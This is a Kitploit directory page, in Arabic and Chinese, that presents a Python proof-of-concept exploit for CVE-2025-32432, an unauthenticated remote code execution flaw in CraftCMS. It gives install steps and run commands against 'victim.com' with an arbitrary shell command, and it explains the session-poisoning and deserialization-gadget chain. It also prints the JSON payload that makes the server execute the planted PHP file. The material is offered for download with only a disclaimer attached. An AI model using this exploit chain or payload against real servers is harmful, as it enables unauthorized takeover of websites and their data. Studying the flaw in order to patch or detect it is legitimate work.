Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32432-PoC — استغلال Python لـ CVE-2025-32432، وهو RCE قبل المصادقة في نقطة تحويل الأصول في CraftCMS. يتضمن سلسلة من حزمتين لتنفيذ أوامر شل عشوائية عبر أدوات إلغاء التسلسل. | Kitploit
أدوات/GitHubGitHub/cty-research-1/cve-2025-32432-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

استغلال Python لـ CVE-2025-32432، وهو RCE قبل المصادقة في نقطة تحويل الأصول في CraftCMS. يتضمن سلسلة من حزمتين لتنفيذ أوامر شل عشوائية عبر أدوات إلغاء التسلسل.

عرض المستودع
641منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32432 سكربتات الاستغلال (Python PoC)

تنفيذ الأوامر عن بُعد بدون مصادقة لـ CraftCMS 3.x / 4.x / 5.x
مُعدّ PoC: C.T.Y. (للاستخدام البحثي فقط)
اكتشاف الثغرة: Nicolas Bourras – Orange Cyberdefense
إلهام إضافي لـ PoC: بحث SensePost وسكربت Chirag Artani العام


1. نظرة عامة

يحتوي هذا المستودع على سكربتين استغلال متكاملتين بالـ Python لـ CVE-2025-32432 — وهي ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في نقطة تحويل الأصول (asset-transform) في CraftCMS.

السكربتالغرض
craftcms_rce_php_check.pyاختبار أمان — يرسل طلبًا واحدًا باستخدام أداة FnStream للتحقق مما إذا كان يمكن تنفيذ PHP عشوائي (يطبع مخرجات phpinfo()). مثالي للتأكيد منخفض التأثير.
craftcms_final_payload.pyاستغلال كامل — سلسلة من حزمتين: أولاً يزرع PHP عبر FnStream، ثم يستفيد من أداة FieldLayoutBehavior → PhpManager لتنفيذ أي أمر شيل.

السكربت الثاني هو الموصوف في هذا الملف.
السكربت الأول مُضمن للإكمال والتحقق السريع، بفضل Chirag Artani — انظر شكر وتقدير.
تم تعديل اسم الملف للتوضيح؛ الهيكل والفكرة الأصليان من Chirag Artani.


2. إخلاء مسؤولية 🚨

للاستخدام التعليمي والاختبار الأمني المصرح به فقط.
استخدام هذه السكربتات ضد أنظمة بدون إذن كتابي صريح هو غير قانوني وغير أخلاقي.


3. الميزات (الحمولة النهائية)

  • RCE بحزمتين في طلقة واحدة
  • تخمين تلقائي لـ assetId (مبدأ 404 → 302)
  • تنفيذ أوامر شيل مخصصة (-c/--cmd)
  • يعمل عبر HTTP أو HTTPS (يتم كتم تحذيرات SSL)
  • استخراج نظيف لمخرجات الأوامر من رد HTML

4. المتطلبات

  • Python 3.8+
  • حزم PyPI (ثبّت عبر pip install -r requirements.txt):
    • requests
    • urllib3

5. التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# تثبيت التبعيات
pip install -r requirements.txt

6. الاستخدام

6.1 فحص سريع لتنفيذ PHP

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://victim.com

إذا رأيت مخرجات phpinfo()، فالهدف على الأرجح قابل للاستغلال.

6.2 استغلال كامل بحزمتين

root@kitploit:~
python3 craftcms_final_payload.py -u https://victim.com -c "id"

الخيارات

الخيارالاسم الطويلالوصفإلزامي
-u--urlرابط القاعدة للهدف (بدون شرطة مائلة)✅
-c--cmdأمر الشيل لتنفيذه✅
-a--assetassetId صالح معروف❌
-s--scan-maxحد التخمين (الافتراضي: 300)❌

7. كيفية عمل الثغرة (ملخص)

  • تسميم الجلسة — طلب GET إلى /index.php?p=admin/dashboard&a=<?=...?> يكتب PHP عشوائي في /tmp/sess_<ID>.
  • أداة إزالة التسلسل — طلب POST إلى actions/assets/generate-transform مع أداة FieldLayoutBehavior → PhpManager يجبر CraftCMS على استدعاء require() لملف الجلسة، مما ينفذ الكود.
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. الإصدارات المختبرة

  • CraftCMS < 3.9.15 (يتطلب تخمين assetId)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. المراجع والقراءة الإضافية

  • الإعلان الأصلي — Nicolas Bourras / Orange Cyberdefense
  • مدونة بحث SensePost المعمقة
  • PoC لتشي راك أرطاني
  • إعلان أمان CraftCMS
  • CVE-2025-32432 @ MITRE

10. شكر وتقدير

  • C.T.Y. — PoC كامل بحزمتين والتوثيق
  • Chirag Artani — سكربت فحص phpinfo الأصلي (craftcms_rce_php_check.py) وأفكار بحثية مبكرة تم تعديل اسم الملف للتوضيح؛ الهيكل والفكرة الأصليان من Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — اكتشاف الثغرة والإفصاح المسؤول
  • رؤى إضافية من فريق بحث SensePost

11. الترخيص

إشعار المسؤولية: أي مخاطر قانونية أو أضرار ناتجة عن استخدام هذا الكود تقع بالكامل على عاتق المستخدم.

MIT License — انظر LICENSE.


中文說明

1. 專案內容

檔案用途
craftcms_rce_php_check.pyPHP 執行可行性檢查:單一請求,使用 FnStream 觸發 phpinfo(),以低影響方式驗證目標是否易受攻擊。
此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
craftcms_final_payload.py兩包鏈完整利用:先以 FnStream 植入 PHP,再透過 PhpManager 執行任意指令。

2. 免責聲明

僅供教學與合法授權測試使用。未經授權操作即屬違法。


3. 快速檢查

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://目標站

4. 完整利用

root@kitploit:~
python3 craftcms_final_payload.py -u https://目標站 -c "id"

參數與英文版相同。


5. 致謝

  • Chirag Artani — phpinfo 檢查腳本 此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
  • Nicolas Bourras / Orange Cyberdefense — 漏洞發現與技術靈感
  • SensePost — 技術靈感

6. 授權

使用本程式碼造成之任何法律風險與損失,由使用者自行承擔。

MIT License

تنزيل الأداة